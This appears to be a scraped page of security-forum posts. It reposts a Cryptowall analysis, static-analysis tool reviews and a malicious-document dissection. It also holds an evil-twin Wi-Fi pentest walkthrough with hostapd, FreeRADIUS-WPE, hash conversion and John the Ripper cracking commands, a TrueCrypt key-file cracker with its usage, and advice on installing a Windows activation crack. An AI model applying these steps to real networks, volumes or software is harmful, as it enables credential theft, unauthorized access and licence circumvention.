Figure 4: A dump of the Global Descriptor Table of a 64-bit System

As the reader can see, descriptor 0x20 and descriptor 0x30 are the Ring 3 code segments that describe the entire user-mode address space, one for 32-bit and one for 64-bit code. Cryptowall uses the proper selectors for these two segment descriptors and switches between the two execution modes during its operation. We were able to reverse this process and reconstruct the assembly language code (shown in Figure 5) that performs this switching between 32- and 64-bit mode by pushing the correct value before executing the far return instruction.

Figure 5: Switching Between 32 & 64 bit Modes. (Click to Enlarge)

Summary

Ransomware is a growing threat to computer users. Variants continue to evolve in functionality and evasive capability. Just getting these complex samples to run in a sandbox can be challenging, making analysis more complicated and involved. Constant research is necessary to develop updated signatures and rules to combat these constant attacks. Identifying and stopping these new complex variants requires a layered security approach.
Breaking any step in the attack chain will successfully prevent this attack. Therefore, blocking the initial phishing emails, blocking network connections to known malicious content, and stopping malicious process activity are all critical to combating ransomware and preventing it from holding your data hostage.

Protecting Users Against These Threats

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. CWS or WSA web scanning prevents access to malicious websites, including downloads of the malware used in these attacks. The network security protection of IPS and NGFW has up-to-date signatures to detect malicious network activity by threat actors. ESA can block phishing emails sent by threat actors as part of this attack.

Source: Ransomware on Steroids: Cryptowall 2.0
  10. It's perfect, exactly what you needed. How much did you pay for it? More than 200?
  11. Upload the software somewhere and give us a link. I'll take a quick look at it, but I'm not promising anything. Didn't you find anything interesting here: https://www.google.ro/search?q=c%2B%2B+magnetic+stripe+reader+usb&ie=utf-8&oe=utf-8&gws_rd=cr ?
  12. Doesn't that MSR reader come with an application of some kind? Writing one yourself, if there's no documentation, is going to be hard. If it's connected over USB, look for a USB sniffer. If it's on a serial port, look for a serial sniffer; those should exist. Watch which packets are sent and received, and maybe you can figure out how it works, at least partially. Edit: I found this: http://www.cardcolor.ro/cititoare/encoder-magnetic-msr-606

1x MSR606 magnetic encoder
1x CD (user manual, USB driver, encoding software)
1x A/C adapter (100-240V, with plug for worldwide use: US, AU, UK or Europe)
1x Cleaning card

That software is most likely for Windows and not open source. I see a driver is required; I hope you don't run into problems because of that. You could try reverse engineering it at a minimal level, I don't know... If you're lucky and it's written in .NET and not obfuscated, you're set. In any case, the language you write your program in is irrelevant; it can be anything. And while we're at it, what exactly do you want to do with it?
  13. Do NOT download from sites like download.windows7loadernew.com, download.windowsloaderdaz.com, or dazloader.com! At home I used: Zippyshare.com - Windows Loader v2 2 2 by Daz.zip Virustotal: https://www.virustotal.com/en/file/2f2aba1e074f5f4baa08b524875461889f8f04d4ffc43972ac212e286022ab94/analysis/1420535361/ (detected as HackTool, Crack, Keygen) I still recommend the SOURCE, as spider mentioned: Windows Loader - Support and chat - Page 1886 Note: Install the loader before installing an antivirus, even though you take some risk doing so. Scan it on VirusTotal. If you install the antivirus first, you can end up with a corrupted MBR (master boot record) and be unable to boot.
  14. Be careful where you download Windows 7 Loader from; I even found a version bundled with adware...
  15. This tool, developed in 2010 by Justin Collins (@presidentbeef), is built specifically for finding vulnerabilities and security issues in Ruby on Rails apps at any development stage. Brakeman is used by the likes of Twitter (where Justin is employed), GitHub, and Groupon to look for vulnerabilities. Justin gave a talk at RailsConf 2012 that's worth watching, describing the value of using SCA early on and how Brakeman accomplishes that.

The Good: Easy setup and configuration, and fast scans. Because it's built specifically for Ruby on Rails apps, it does a great job of checking configuration settings against best practices. With the ability to check only certain subsets, each code analysis can be customized to target specific issues. The developer has maintained and updated the tool regularly since its first release.

The Not-So-Good: Because of its suspicious nature, the tool can show a high rate of false positives. As the tool's FAQ page notes, a report with zero warnings doesn't mean your application is flaw-free: "There may be vulnerabilities Brakeman does not test for or did not discover. No security tool has 100% coverage."

Source: Brakeman - Rails Security Scanner
  16. This tool, available under the GNU General Public License, was developed to check for non-standard code that compilers would normally not detect. Created by Daniel Marjamäki, Cppcheck offers a command-line mode as well as a GUI mode and has a number of options for environment integration.

The Good: Plugins and integrations for a number of IDEs and build servers: Eclipse, Hudson, Jenkins, Visual Studio. Daniel's plan is to release a new version every other month or so, and he has been keeping up with that goal. Available in many languages, including English, Dutch, Finnish, Swedish, German, Russian, Serbian and Japanese.

The Not-As-Good: Doesn't detect a large number of bugs (as with most of the other tools). Customization requires a good deal of effort. Scans take longer than with other tools.

Source: cppcheck | SourceForge.net
  17. Designed to be simple and easy to use, Flawfinder reports well-known security issues in applications written in C, sorted by risk level. Developed by open-source and secure-software expert David Wheeler, the tool itself is written in Python and uses a command-line interface. Flawfinder is officially CWE-compatible.

The Good: Ability to check only the changes made to the code, for faster, more accurate results. Long history: released in 2001, with consistent updates.

The Not-As-Good: A number of false positives. Requires Python 1.5.

Source: Flawfinder Home Page
  18. Created by ethical hacker Ryan Dewhurst (@ethicalhack3r) for his undergraduate thesis, DevBug is a very simple online PHP static code analysis tool. Written in JavaScript, it was designed to make SCA easy and draws inspiration (as well as taint-analysis data) from RIPS.

The Good: Easy to use, with instant results. Nice use of links to OWASP wiki pages for more info on any found vulnerability.

The Not-As-Good: Simplistic, and only meant for light analysis.

Source: http://www.devbug.co.uk/
  19. The tool, whose name stands for Lightweight Analysis for Program Security in Eclipse, is an OWASP security scanner, developed as an Eclipse plugin, which detects vulnerabilities in Java EE applications. LAPSE+ is licensed under the GNU General Public License v3 and was originally developed by Stanford University.

The Good: Tests validation logic without compiling your code. Presents results in three steps: Vulnerability Source, Vulnerability Sink and Provenance Tracker.

The Not-As-Good: Doesn't identify compilation errors. Limited to the Eclipse IDE only. The project was taken over in early 2014, but there has been no new version since 2012.

Source: https://www.owasp.org/index.php/OWASP_LAPSE_Project
  20. YASCA (Yet Another Source Code Analyzer) analyzes primarily Java and C/C++, along with other languages and JavaScript, for security flaws and other bugs. Its creator, Michael Scovetta, aggregated many other popular static analysis tools and made it easy to integrate with a variety of other tools, including others on this list: FindBugs, CppCheck, and more. The tool was created in 2008 to help developers look for security bugs by automating part of their code review and finding the "low-hanging fruit." For more info on Yasca, check out the presentation that Michael Scovetta gave at the NY PHP Conference in '09. The latest version, 3.0.4, was released in 2012. See the GitHub repository here.

The Good: Because YASCA aggregates other powerful tools, it takes the best parts of each and combines them for broader coverage.

The Not-As-Good: Broader does not mean deeper: keep in mind that this tool was built to look for low-hanging fruit like SQL injection and XSS, so be wary of missing more serious issues.

Source: https://github.com/scovetta/yasca
  21. This automated code security tool works with C++, C#, VB, PHP and Java to identify insecurities and other issues in the code. Developed by Nick Dunn (@N1ckDunn), the tool quickly scans and describes, in detail, the issues it finds, offering an easy-to-use interface.

The Good: Allows custom configurations for your own queries. Reports the severity level of the vulnerabilities it finds. Searches intelligently for specific violations of OWASP recommendations. Consistently updated since its creation in 2012.

The Not-As-Good: While it can analyze many languages, you have to tell it which language you're scanning. Scans for a fixed list of vulnerabilities that cannot be modified. Isn't fully automated.

Source: SourceForge.net: VisualCodeGrepper V2.0.0 - Project Web Hosting - Open Source Software
  22. [h=1]D-Link's new routers look crazy, but they're seriously fast[/h] by Steve Dent | @stevetdent | January 5th 2015 at 4:57 am D-Link has just jumped the router shark with its latest AC5300, AC3200 and AC3100 Ultra Performance models. On top of speeds up to 5.3Gbps for the AC5300 model, the 802.11ac devices feature, um, striking looks that hopefully won't frighten small children or animals. D-Link calls the models "attractive" with a "modern form-factor for today's homes," and we'd agree -- provided you live in some kind of rouge-accented spaceship. Performance-wise, however, the new models are definitely drool-worthy, thanks to 802.11ac tri-band beamforming speeds between 3.1 and 5.3Gbps, along with gigabit ethernet, high-power antennas and onboard USB 3.0 ports. You can control the devices with a smartphone or tablet, and D-Link also outed an optional DWA-192 USB 3.0 adapter, which connects to laptops and PCs to give them an 802.11ac connection. The AC3200 model will run $310 and is available now from NewEgg, while the rest of the pricing and models will come next quarter. On top of the wireless stuff, D-Link also announced new PowerLine HomePlug kits, with speeds up to 2Gbps. The company says the DHP-701AV (2Gbps) and DHP-601AV (1Gbps) adapters use the fastest two wires in a typical three-wire power installation, with pushbutton connection for ease of installation and security. Both kits come with two adapters and will run $130 (DHP-701AV) and $80 (DHP-601AV), with both arriving later this quarter. Source: D-Link's new routers look crazy, but they're seriously fast
  23. [h=3]Professionally Evil: This is NOT the Wireless Access Point You are Looking For[/h] I was recently conducting a wireless penetration test and was somewhat disappointed (but happy for our client) to find that they had a pretty well configured set of wireless networks. They were using WPA2 Enterprise, and I could find no real weaknesses in their setup. After conducting quite a bit of analysis on network captures and looking for any other source of weakness, I finally concluded that I wasn't going to get anywhere with the approaches I was taking. Rather than giving up and leaving it at that, I decided to go after the clients using the network and see what I could get them to do. I had a laptop and a number of iOS, Android and Palm devices at my disposal, so how would they respond to a fake access point? I decided to set up a fake access point (AP) using a matching SSID, which we will call "FOOBAR" for our purposes. I downloaded the latest version of hostapd (2.0 as of this post), set it up to use WPA2 Enterprise, and configured FreeRADIUS-WPE as the fake authentication system. The goal was to have a client connect to my evil AP and then give me their credentials. FreeRADIUS-WPE came pre-installed on my laptop running BackTrack, so no real work there. About all I did was install a valid SSL certificate for use by the RADIUS daemon. Unfortunately, I could never get FreeRADIUS-WPE to handle the CA certificate chain correctly, and that had an impact on my attack later on. If you don't care about a valid TLS certificate, then start FreeRADIUS-WPE on BackTrack by running "radiusd -X". The -X will cause the daemon to set up self-signed TLS certificates automatically. With that done, I moved on to installing hostapd. At first I installed hostapd from the apt repositories already set up in BackTrack. Unfortunately, there was an issue with that version and my setup, which caused it to fail at startup.
To get around this, I downloaded and installed the app from source and the problem went away. Below is my hostapd.conf file. This config is largely based on some searches for default configurations of hostapd, after which I researched the settings I needed to get WPA2 Enterprise working. The critical pieces were setting wpa=1 and then setting wpa_key_mgmt=WPA-EAP. I also made sure that hostapd was pointed at my RADIUS server and had the correct password to access it. Last, I set my SSID to match our client's environment (or, in this example, "FooBar"). To get hostapd running, I ran "hostapd hostapd.conf" and I was up and running. I picked up my test iPhone and found FooBar in my list of available networks. When I selected this network, I was prompted for my test account's username and password. So far so good... Then I hit a major snag in making this attack invisible. The SSL certificate chain was not being presented properly, so my cert showed up as invalid. After a bit of troubleshooting and a dwindling testing window for this attack, I finally had to relegate fixing this to later research. And honestly, if someone is presented with an invalid certificate, the chances are pretty high I'd get them to click through in spite of the warning. I accepted this warning and proceeded on with my test. The credentials were sent to my fake AP and FreeRADIUS-WPE captured them. The password itself doesn't get sent across, but that's hardly an issue in this case. I'm using a really dumb password for our example, and John the Ripper with a good password list will have no issues with it. All we need to do is take the username and hashes and put them into a text file in the format that john expects for NETNTLM hashes. This involves removing all the colons in the hashes and getting them delimited properly for the expected format. My two entries end up looking like this in my capture file.
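The colon-stripping and re-delimiting step described above is easy to script. This sketch emits the $NETNTLM$ input form that jumbo John the Ripper accepts for --format=NETNTLM; the username, challenge, and response values below are hypothetical stand-ins for the entries in the post's capture file, not the real ones.

```python
def wpe_to_john(username: str, challenge: str, response: str) -> str:
    """Turn a FreeRADIUS-WPE challenge/response pair (colon-separated hex,
    as logged) into a $NETNTLM$ line for John the Ripper."""
    chal = challenge.replace(":", "").lower()
    resp = response.replace(":", "").lower()
    return f"{username}:$NETNTLM${chal}${resp}"

# Hypothetical values, for illustration only:
line = wpe_to_john(
    "testuser",
    "a1:b2:c3:d4:e5:f6:07:18",
    "00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:"
    "00:11:22:33:44:55:66:77",
)
```

Each resulting line goes into the hashes.txt file that john is pointed at.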
Finally, I turn John loose on the hashes by running "john -w:/pentest/passwords/wordlists/rockyou.txt --format=NETNTLM hashes.txt". As expected, the hashes broke within seconds. At this point the attacker wins by using these credentials to log into the targeted network and proceeds with whatever the next step in their attack is. There were a few steps to get to this point, but really it was pretty straightforward. Happy pen testing! Jason Wood is a Senior Security Consultant with Secure Ideas. If you are in need of a penetration test or other security consulting services you can contact him at jason@secureideas.com or visit the Secure Ideas - Professionally Evil site for services provided. Posted by Jason Wood at 9:18 PM Source: Secure Ideas: Professionally Evil!: Professionally Evil: This is NOT the Wireless Access Point You are Looking For
  24. What It Looks Like: Disassembling A Malicious Document I recently analyzed a malicious document by opening it on a virtual machine; this was intended to simulate a user opening the document, and the purpose was to determine and document artifacts associated with the system being infected. This dynamic analysis was based on the original analysis posted by Ronnie from PhishMe.com, using a copy of the document that Ronnie graciously provided. After I had completed the previous analysis, I wanted to take a closer look at the document itself, so I disassembled the document into its component parts. After doing so, I looked around on the Internet to see if there was anything available that would let me take this analysis further. While I found tools that would help me with other document formats, I didn't find a great deal that would help me with this particular format. As such, I decided to share what I'd done and learned. The first step was to open the file, but not via MS Word...we already know what happens if we do that. Even though the document ends with the ".doc" extension, a quick look at the document with a hex editor shows us that its format is that of the newer MS Office document format; i.e., compressed XML. As such, the first step is to open the file using a compression utility, such as 7Zip, as illustrated in figure 1.

Figure 1: Document open in 7Zip

As you can see in figure 1, we now have something of a file system-style listing that will allow us to traverse the core contents of the document without actually having to launch the file. The easiest way to do this is to simply extract the contents visible in 7Zip to the file system. Many of the files contained in the exported/extracted document contents are XML files, which can be easily viewed using viewers such as Notepad++.
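The same unpacking done here with 7Zip can be scripted with Python's standard zipfile module, since the newer Office format is just a ZIP container; the file and directory names passed in are placeholders.

```python
import zipfile

def list_and_extract(doc_path: str, out_dir: str):
    """List the document's internal files and extract them for review,
    without ever opening the file in Word."""
    with zipfile.ZipFile(doc_path) as zf:
        names = zf.namelist()   # e.g. docProps/app.xml, word/vbaProject.bin
        zf.extractall(out_dir)  # mirror the archive onto the file system
    return names
```

Typical entries in a document like this one include docProps/app.xml, word/document.xml, word/vbaProject.bin and word/_rels/document.xml.rels.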
Figure 2 illustrates partial contents of the file "docProps/app.XML".

Figure 2: XML contents

Within the "word" folder, we see a number of files, including vbaData.xml and vbaProject.bin. If you remember from the PhishMe.com blog post about the document, there was mention of the string 'vbaProject.bin', and the Yara rule at the end of the post included a reference to the string “word/_rels/vbaProject.bin”. Within the "word/_rels" folder, there are two files, vbaProject.bin.rels and document.xml.rels, both of which are XML-format files. These documents describe object relationships within the overall document file, and of the two, document.xml.rels is perhaps the more interesting, as it contains references to image files (specifically, "media/image1.jpg" and "media/image2.jpg"). Locating those images, we can see that they're the actual blurred images that appear in the document, and that there are no other image files within the extracted file system. This supports our finding that clicking the "Enable Content" button in MS Word did nothing to make the blurred images readable. Opening the word/vbaProject.bin file in a hex editor, we can see from the 'magic number' that the file is in the structured storage, or OLE, file format. The 'magic number' is illustrated in figure 3.

Figure 3: vbaProject.bin file header

Knowing the format of the file, we can use the MiTeC Structured Storage Viewer tool to open this file and view its contents (directories, streams), as illustrated in figure 4.
Figure 4: vbaProject

Figure 5 illustrates another view of the file contents, providing time stamp information from the "VBA" folder.

Figure 5: Time stamp information

Remember that the original PhishMe.com write-up regarding the file stated that the document had originally been seen on 11 Dec 2014. This information can be combined with other time stamp information in order to develop an "intel picture" around the infection itself. For example, according to VirusTotal, the malicious .exe file that was downloaded by this document was first seen by VT on 12 Dec 2014. The embedded PE compile time for the file is 19 June 1992. While the time stamps embedded within the document itself, as well as the PE compile time for the 'msgss.exe' file, may be trivial to modify and obfuscate, looking at the overall wealth of information provides analysts with a much better view of the file and its distribution than does viewing any single time stamp in isolation. If we continue navigating through the structure of the document and go to the VBA\ThisDocument stream (seen in figure 4), we will see references to the files (batch file, Visual Basic script, and Powershell script) that were created within the file system on the infected system. Summary My goal in this analysis was to see what else I could learn about this infection by disassembling the malicious document itself. My hope is that the process discussed in this post will serve as an initial roadmap for other analysts, and be extended in the future.
Tools Used
7Zip
Notepad++
Hex Editor (UltraEdit)
MiTeC Structured Storage Viewer

Resources
Lenny Zeltser's blog - Analyzing Malicious Documents Cheat Sheet
Virus Bulletin presentation (from 2009)
Kahu Security blog post - Dissecting a Malicious Word document
Document-Analyzer.net - upload documents for analysis

Posted by Harlan Carvey at 8:37 AM Source: Windows Incident Response: What It Looks Like: Disassembling A Malicious Document
  25. TrueCrypt key file cracker. [h=1]Usage[/h] python tckfc.py [-h] [-c [COMBINATION]] keyfiles tcfile password mountpoint

keyfiles: Directory of possible key files
tcfile: TrueCrypt encrypted file
password: Password for the TrueCrypt file
mountpoint: Mount point

[h=1]Example[/h]
mkdir mnt
cp a.pdf keys/
cp b.doc keys/
cp c.txt keys/
cp d.jpg keys/
cp e.gif keys/
python tckfc.py keys/ encrypted.img 123456 mnt/

Source: https://github.com/Octosec/tckfc
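Judging from the -c/--combination option, the cracker tries key files from the directory singly and in combination until one set (together with the password) mounts the volume. A rough sketch of that search loop follows; try_mount is a hypothetical stand-in for the actual TrueCrypt mount attempt, not part of the tool's API.

```python
import itertools
import os

def candidate_keyfile_sets(keydir: str, max_combo: int = 2):
    """Yield every combination of files under `keydir`, smallest first."""
    files = sorted(os.path.join(keydir, f) for f in os.listdir(keydir))
    for r in range(1, max_combo + 1):
        yield from itertools.combinations(files, r)

def crack(keydir: str, try_mount, max_combo: int = 2):
    """Return the first key-file set for which `try_mount` succeeds,
    or None if no combination mounts the volume."""
    for combo in candidate_keyfile_sets(keydir, max_combo):
        if try_mount(combo):
            return combo
    return None
```

The combination count grows quickly with the number of candidate files, which is why pre-filtering the key-file directory matters.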